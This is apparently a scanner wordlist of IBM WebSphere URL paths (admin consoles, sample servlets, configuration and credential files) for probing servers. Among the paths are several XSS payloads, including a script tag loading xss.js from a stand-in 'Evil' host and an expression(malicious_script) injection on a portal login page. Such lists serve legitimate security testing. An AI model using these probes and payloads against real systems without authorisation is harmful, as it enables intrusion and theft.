/
/*
/*.do
/*.jsp
/*.jsv
/*.jsw
/_DynaCacheEsi
/_DynaCacheEsi/*
/_DynaCacheEsi/esiInvalidator
/ab/*
/ab/docs/*
/activitysessions/docs/*
/addNodeListener
/AddressBookJ2WB
/AddressBookJ2WB/*
/AddressBookJ2WE/*.jsp
/AddressBookJ2WE/*.jsv
/AddressBookJ2WE/*.jsw
/AddressBookJ2WE/services/AddressBook
/AddressBookJ2WE/services/AddressBook/wsdl/*
/AddressBookW2JB
/AddressBookW2JB/*
/AddressBookW2JE/*.jsp
/AddressBookW2JE/*.jsv
/AddressBookW2JE/*.jsw
/AddressBookW2JE/services/AddressBook
/AddressBookW2JE/services/AddressBook/wsdl/*
/admin
/admin.conf
/admin.passwd
/admin/*
/admin/logon.jsp
/admin/secure/logon.jsp
/admin-authz.xml
/AlbumCatalogWeb
/AlbumCatalogWeb/*
/AlbumCatalogWeb/docs/*
/AlbumCatalogWeb/docsservlet
/AlbumCatalogWeb/docsservlet/*
/AlbumCatalogWebservlet
/AlbumCatalogWebservlet/*
/apadminred
/apadminred.html
/aphtpasswd.html
/AppInstallStatusServlet
/ApplicationProfileSample
/ApplicationProfileSample/*
/ApplicationProfileSample/docs/*
/ApplicationProfileSampleservlet
/ApplicationProfileSampleservlet/*
/AppManagementStatus
/AppServer
/asynchbeans/*
/asynchbeans/docs/*
/Bank/*.jsp
/Bank/*.jsv
/Bank/*.jsw
/Bank/services/Transfer_SEI
/Bank/services/Transfer_SEI/wsdl
/Bank/services/Transfer_SEI/wsdl/*
/BBApp
/BeenThere
/cachemonitor
/cachemonitor/statistics.jsp
/cell.xml
/cells
/cgi-bin
/cgi-bin/
/ClusterRollout
/com.ibm.ws.console.events
/com.ibm.ws.console.events/runtime_messages.jsp
/config
/console
/ControllerServlet
/debug_error.jsp
/DynaCacheESI
/DynaCacheESI/esiInavlidator
/DynamicQuery/docs/*
/DynamicQuery/EmployeeFinder
/DynamicQuery/EmployeeFinder/*
/error
/error.jsp
/ErrorReporter
/ErrorServlet
/esiInavlidator
/estore
/estore/annotated-index.html
/estore/index.html
/estore/populate
/examples
/FileTransfer
/GalleryMenu
/Greenhouse
/Greenhouse/*
/GreenhouseByWebSphere/docs/*
/GreenhouseEJB/*.jsp
/GreenhouseEJB/*.jsv
/GreenhouseEJB/*.jsw
/GreenhouseEJB/services/GreenhouseFront
/GreenhouseEJB/services/GreenhouseFront/wsdl/*
/Greenhouseservlet
/Greenhouseservlet/*
/GreenhouseWeb
/GreenhouseWeb/*
/GreenhouseWebservlet
/GreenhouseWebservlet/*
/hello
/helloEJB
/HelloHTML.jsp
/HelloHTMLError.jsp
/HelloPervasive
/HelloVXML.jsp
/HelloVXMLError.jsp
/HelloWML.jsp
/HelloWMLError.jsp
/HelloWorld
/HelloWorldServlet
/HitCount
/HitCount.jsp
/hod/frameset.html?Java2=true
/hod/HODAdmin.html
/httpd.conf
/i18nctxSample
/i18nctxSample/*
/i18nctxSample/docs/*
/ibm
/ibm/console
/ibm/console//navigatorCmd.do
/ibm/console/<script/src=http://Evil/xss.js></script>
/ibm/console/<script>alert('DSecRG_XSS')</script>
/ibm/console/<script>alert('DSecRG_XSS')</script>.jsp
/ibm/console/adminSecurityDetail.do?action=Edit&displayActiveUserRegistry=Repositorios+federados&selectUserRegistry=WIM&activeAuthMe
/ibm/console/login.do?action=secure
/ibm_security_logout
/IBMDefaultErrorReporter
/IBMWebAS
/icons
/images
/index.html
/index.jsp
/ivt
/ivt/*
/ivt/ivtDate.jsp
/ivt/ivtejb
/ivt/ivtservler
/ivt/ivtservlet
/ivtejb
/ivtserver
/ivtservlet
/j_security_check
/jsp
/JTAExtensionsSamples/docs/*
/JTAExtensionsSamples/TransactionTracker
/JTAExtensionsSamples/TransactionTracker/*
/License.txt
/login.html
/MANIFEST.MF
/manual
/manual/index.html
/MessageDrivenBeans/docs/*
/MessageDrivenBeans/docsservlet/*
/META-INF
/node.xml
/nodes
/opc/*.jsp
/opc/*.jsv
/opc/*.jsw
/opc/services/BrokerServiceIntfPort
/opc/services/BrokerServiceIntfPort/wsdl/*
/opc/services/OrderTrackingIntfPort
/opc/services/OrderTrackingIntfPort/wsdl/*
/opc/services/PurchaseOrderIntfPort
/opc/services/PurchaseOrderIntfPort/wsdl/*
/opt
/OrderProcessorEJB/*
/OrderProcessorEJB/*.jsp
/OrderProcessorEJB/*.jsv
/OrderProcessorEJB/*.jsw
/OrderProcessorEJB/services/FrontGate
/OrderProcessorEJB/services/FrontGate/wsdl/*
/petstore
/petstore/*
/ping
/PlantsByWebSphere
/PlantsByWebSphere/*
/PlantsByWebSphere/docs
/removeNodeListener
/resources.xml
/runtime_messages.jsp
/samples/activitysessions
/samples/activitysessions/*
/SamplesGallery
/SamplesGallery/*
/scheduler
/scheduler/*
/scheduler/docs/*
/scripts
/secure/downloadFile/*
/securecleanup
/security.xml
/server.xml
/serverindex.xml
/server-info
/servers
/server-status
/servlet
/servlet/*
/servlet/aphtpassword
/servlet/com.ibm.as400ad.webfacing.runtime.httpcontroller.ControllerServlet
/servlet/com.ibm.servlet.engine.webapp.DefaultErrorReporter
/servlet/com.ibm.servlet.engine.webapp.InvokerServlet
/servlet/com.ibm.servlet.engine.webapp.SimpleFileServlet
/servlet/com.ibm.servlet.engine.webapp.UncaughtServletException
/servlet/com.ibm.servlet.engine.webapp.WebAppErrorReport
/servlet/ControllerServlet
/servlet/ErrorReporter
/servlet/hello
/servlet/HelloWorldServlet
/servlet/HitCount
/servlet/SimpleServlet
/servlet/snoop
/servlet/snoop2
/servlet/SnoopServlet
/servlet/TheExpiringHTMLServlet
/servlet/WebSphereSamples.Configuration.config
/servlet/WebSphereSamples.Form.FormServlet
/servlet/WebSphereSamples.YourCo.News.NewsServlet
/servletcache
/showCfg
/sibstatus
/simple.jsp
/simpleJSP
/SimpleServlet
/snoop
/snoop/*
/snoop2
/SnoopServlet
/SourceCodeViewer
/Sourceservlet-classViewer
/statistics.jsp
/status
/statuspoll
/StockQuote/*.jsp
/StockQuote/*.jsv
/StockQuote/*.jsw
/StockQuote/services/xmltoday-delayed-quotes
/StockQuote/services/xmltoday-delayed-quotes/wsdl/*
/TechnologySamples/AddressBook
/TechnologySamples/AddressBook/*
/TechnologySamples/AddressBook/*.jsp
/TechnologySamples/AddressBook/*.jsv
/TechnologySamples/AddressBook/*.jsw
/TechnologySamples/AddressBook/AddressBookServlet
/TechnologySamples/AddressBook/servlet/*
/TechnologySamples/BasicCalculator
/TechnologySamples/BasicCalculator/*
/TechnologySamples/BulletinBoard
/TechnologySamples/BulletinBoard/*
/TechnologySamples/BulletinBoardservlet
/TechnologySamples/BulletinBoardservlet/*
/TechnologySamples/Calendar
/TechnologySamples/Calendar/*
/TechnologySamples/docs
/TechnologySamples/FilterServlet
/TechnologySamples/FilterServlet/*
/TechnologySamples/FormLogin
/TechnologySamples/FormLogin/*
/TechnologySamples/FormLoginservlet
/TechnologySamples/FormLoginservlet/*
/TechnologySamples/JAASLogin
/TechnologySamples/JAASLogin/*
/TechnologySamples/JAASLoginservlet
/TechnologySamples/JAASLoginservlet/*
/TechnologySamples/MovieReview
/TechnologySamples/MovieReview/*
/TechnologySamples/MovieReview2_0
/TechnologySamples/MovieReview2_0/*
/TechnologySamples/MovieReview2_1
/TechnologySamples/MovieReview2_1/*
/TechnologySamples/PageReturner
/TechnologySamples/PageReturner/*
/TechnologySamples/PageReturnerservlet
/TechnologySamples/PageReturnerservlet/*
/TechnologySamples/ReadingList
/TechnologySamples/ReadingList/*
/TechnologySamples/SimpleJSP
/TechnologySamples/SimpleJSP/*
/TechnologySamples/SimpleServlet
/TechnologySamples/SimpleServlet/*
/TechnologySamples/Subscription
/TechnologySamples/Subscription/*
/TechnologySamples/Subscription/SubscriptionJSP.jsp
/TechnologySamples/Subscriptionservlet
/TechnologySamples/Subscriptionservlet/*
/TechnologySamples/Taglib
/TechnologySamples/Taglib/*
/theme
/tradetheme
/transfer
/uddigui/*
/uddisoap/*
/variables.xml
/very_simple.jsp
/virtualhosts.xml
/WarehouseEJB/*.jsp
/WarehouseEJB/*.jsv
/WarehouseEJB/*.jsw
/WarehouseEJB/services/WarehouseFront
/WarehouseEJB/services/WarehouseFront/wsdl/*
/WarehouseWeb
/WarehouseWeb/*
/WarehouseWebservlet
/WarehouseWebservlet/*
/wasPerfTool
/wasPerfTool/*
/wasPerfToolservlet
/wasPerfToolservlet/*
/web.xml
/web/configDocs/
/webapp
/webapp/examples/ErrorServlet
/webapp/examples/HelloPervasive
/webapp/examples/HitCount
/webapp/examples/login.html
/webapp/examples/ping
/webapp/examples/showCfg
/webapp/examples/simple.jsp
/webapp/examples/SourceCodeViewer
/webapp/examples/verify
/webexec
/WEB-INF
/WEB-INF./web.xml
/WEB-INF/web.xml
/WebServicesSamples/docs/*
/WebSphere
/WebSphereBank
/WebSphereBank/*
/WebSphereBank/docs/*
/WebSphereBankDeposit
/WebSphereBankDeposit/*
/WebSphereBankDepositservlet
/WebSphereBankDepositservlet/*
/WebSphereBankservlet
/WebSphereBankservlet/*
/WebSphereSamples
/WebSphereSamples.Configuration.config
/WebSphereSamples/
/WebSphereSamples/SingleSamples/AccountAndTransfer/create.html
/WebSphereSamples/SingleSamples/Increment/increment.html
/WebSphereSamples/YourCo/main.html
/workarea/*
/workarea/docs/*
/wps/images/dot.gif
/wps/themes/html/blanco/img/Portal.ico
/wps/wcm/connect/migration/ITESM%3fsrv=cmpnt&source=library&cmpntname=HTML%20-%20egade.wcm.css
/wps/wcm/webinterface/login/login.jsp?"style="tr:expression(malicious_script)
/wssamplemtom/demo
/WSsamples
/WSsamples/*
/WSsamples/de
/WSsamples/de/*
/WSsamples/en
/WSsamples/en/*
/WSsamples/en/index.html
/WSsamples/es
/WSsamples/es/*
/WSsamples/fr
/WSsamples/fr/*
/WSsamples/index.jsp
/WSsamples/it
/WSsamples/it/*
/WSsamples/ja
/WSsamples/ja/*
/WSsamples/ko
/WSsamples/ko/*
/WSsamples/pt_br
/WSsamples/pt_br/*
/WSsamples/zh_cn
/WSsamples/zh_cn/*
/WSsamples/zh_tw
/WSsamples/zh_tw/*
